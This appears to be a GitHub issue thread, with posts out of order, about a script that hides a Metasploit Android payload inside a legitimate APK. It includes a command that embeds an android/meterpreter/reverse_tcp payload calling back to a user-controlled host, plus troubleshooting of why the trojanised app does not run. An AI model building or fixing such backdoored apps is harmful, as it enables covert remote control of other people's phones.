Closed homecoder closed 8 years ago
Hi @homecoder ,you'll find it in working dir of script.
@xc0d3rz ,
NOT RUNNING and NOT FOUND are two different issues - for clarification, this I found the _embbeded APK, however when running on the target android device the malicious payload is not running.
The Android device is my testing device, and is vulnerable to the exploit as mentioned earlier as running the payload directly from msfvenom works fine.
The issue is: I can run the script, I found the file with the embedded payload, but it does not work on the target device.
Hi Team,
I am unsure if I am doing something wrong - I can't seem to get the _embedded APK
Environment: Fully updated Kali 2 (Rolling) Command: ./run original.apk.file.apk -p android/meterpreter/reverse_tcp LHOST=my.domain.com Notes: Creating a direct APK (msfvenom) using the same options worked exactly as expected.
Output from command:
Is it possible that the warnings listed above could be preventing the the embedded metasploit APK from running? I didn't think much of it as it was a warning vs error.